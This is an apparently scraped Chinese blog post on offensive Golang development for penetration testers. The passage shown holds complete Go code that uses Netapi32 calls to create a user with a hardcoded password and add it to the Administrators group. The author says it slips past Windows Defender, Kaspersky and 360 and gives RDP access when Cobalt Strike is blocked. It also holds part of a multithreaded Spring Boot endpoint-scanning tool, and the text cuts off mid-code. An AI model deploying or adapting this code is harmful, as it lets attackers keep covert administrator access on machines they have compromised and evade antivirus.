您所在的位置：网站首页 › diapute和argue › go

go

2023-03-28 22:19| 来源: 网络整理| 查看: 265

Golang安全开发闲谈简介windows api 使用Spring渗透线程小工具ScareCrow数字签名Go版本的地狱门argue欺骗cobalt strike免杀加载器.NET assembly 内存加载浏览器解密Go编译技巧总结

Golang安全开发闲谈

简介

主要是给师傅们,介绍一下Golang的一些用法和小技巧.

windows api 使用

首先我们介绍用Go语言去添加用户.这里可以给大家介绍一个小技巧,因为Go和C的语法是比较相似的,所以可以去对比C的写法来写Go的.

要注意的是C语言在底层这里很多都定义好了,但Go并没有定义好,所以我们要重写

USER_INFO_1 ui; //这个因为已经在C中定义好了//我们可以Ctrl+单击进入看看这一个结构体

为了让Go减少体积,这里便不去调用第三方库了,下面对一些结构体和类型进行相对应的重写

type ( DWORD uint32 LPWSTR uintptr)type USER_INFO_1 struct { usri1_name LPWSTR usri_password LPWSTR usri1_password_age DWORD usri1_priv DWORD usri1_home_dir LPWSTR usri1_comment LPWSTR usri1_flags DWORD usri1_script_path LPWSTR}

因为添加管理员用户涉及了Golang api的字符串形式,这里我们可利用syscall.UTF16PtrFromString进行转换。

user.usri1_name = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("test57")))user.usri_password = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("P@sss!111")))

当然我们也可以看到C语言版中有USER_PRIV_USER字样,点进去看是被定义为1的然后我们就可以模仿写出

const ( USER_PRIV_USER = 1 UF_SCRIPT = 0x0001 NERR_Success = 0)

当我们这些结构体和变量都处理好的时候,我们便可以调用DLL里面的API进入操作了最终可以不受环境影响32位Go程序是600kb左右这个功能目前也集中在免杀平台里面.

//author:YanMupackage mainimport ( "syscall" "unsafe")type ( DWORD uint32 LPWSTR uintptr)const ( USER_PRIV_USER = 1 UF_SCRIPT = 0x0001 NERR_Success = 0)type USER_INFO_1 struct { usri1_name LPWSTR usri_password LPWSTR usri1_password_age DWORD usri1_priv DWORD usri1_home_dir LPWSTR usri1_comment LPWSTR usri1_flags DWORD usri1_script_path LPWSTR}type _LOCALGROUP_USERS_INFO_0 struct { lgrui0_name LPWSTR}var ( Netapi32, _ = syscall.LoadLibrary("Netapi32.dll") NetUserAdd, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetUserAdd") NetLocalGroupAddMembers, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetLocalGroupAddMembers") dwError DWORD = 0 user USER_INFO_1 = USER_INFO_1{} account _LOCALGROUP_USERS_INFO_0 = _LOCALGROUP_USERS_INFO_0{})func add_user_To_the_admin_group() { user.usri1_name = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("test57"))) user.usri_password = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("P@sss!111"))) user.usri1_priv = USER_PRIV_USER user.usri1_flags = UF_SCRIPT if a, _, _ := syscall.Syscall6(NetUserAdd, 4, 0, 1, uintptr(unsafe.Pointer(&user)), uintptr(dwError), 0, 0); a == 0 { println("添加用户成功!") } else { println("添加用户失败") } account.lgrui0_name = user.usri1_name var admin_group LPWSTR admin_group = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("Administrators"))) if d, _, _ := syscall.Syscall6(NetLocalGroupAddMembers, 5, 0, uintptr(admin_group), 3, uintptr(unsafe.Pointer(&account)), 1, 0); d == NERR_Success { println("添加用户到管理员组成功!") } else { println("添加用户到管理员组失败") } defer func() { syscall.FreeLibrary(Netapi32) }()}func main() { add_user_To_the_admin_group()}

当然可能这种调用这种API,没有威胁性,我测试的是windows def和卡巴斯基都可以添加上,也包括360,但看到Tools上说到C的不免杀了

[]最新版360已经拦截netapi加用户了。 - T00ls.Net,

就写出了Go版本的,毕竟如果杀软拦截CS特征,但还能登上3389还挺香的.

Spring渗透线程小工具

在实际操作的时候,我们都会根据需求来写一些满足自己的小工具

这里以比较火的Spring boot为例

//author:YanMupackage main/*LQ*/import ( "bufio" "crypto/tls" "flag" "fmt" "io/ioutil" "net/http" "os" "strconv" "strings" "sync" "time")var ( numberTasks []string the_returned_result_is_200 []string list_of_errors []string t = &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } opt = option())type FLAG_TO_CHOOSE struct { src_file string des_file string routineCountTotal int urls string}func option() *FLAG_TO_CHOOSE { src_file := flag.String("s", "spring.txt", "字典文件") urls := flag.String("u", "", "目标url") des_file := flag.String("d", "result.txt", "结果文件") routineCountTotal := flag.Int("t", 40, "线程数量{默认为40}") flag.Parse() return &FLAG_TO_CHOOSE{src_file: *src_file, urls: *urls, des_file: *des_file, routineCountTotal: *routineCountTotal}}func title() { fmt.Println(` ▄████ ▒█████ ██▒ ▀█▒▒██▒ ██▒▒██░▄▄▄░▒██░ ██▒░▓█ ██▓▒██ ██░░▒▓███▀▒░ ████▓▒░ ░▒ ▒ ░ ▒░▒░▒░ ░ ░ ░ ▒ ▒░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░`)}func main() { title() file, err := os.Open(opt.src_file) if err != nil { fmt.Println("打开文件时候出错") } defer func() { file.Close() }() n := bufio.NewScanner(file) for n.Scan() { data := n.Text() numberTasks = append(numberTasks, data) } client = &http.Client{ Transport: t, Timeout: 20 * time.Second, } beg := time.Now() wg := &sync.WaitGroup{} tasks := make(chan string) results := make(chan string) go func() { for result := range results { if result == "" { close(results) } else if strings.Contains(result, "200") || strings.Contains(result, "端点") { fmt.Println(result) the_returned_result_is_200 = append(the_returned_result_is_200, result) } else if strings.Contains(result, "500") { if strings.Contains(result, "article") { fmt.Println(result) the_returned_result_is_200 = append(the_returned_result_is_200, result) } } else { list_of_errors = append(list_of_errors, result) } } }() for i := 0; i

【本文地址】

公司简介

联系我们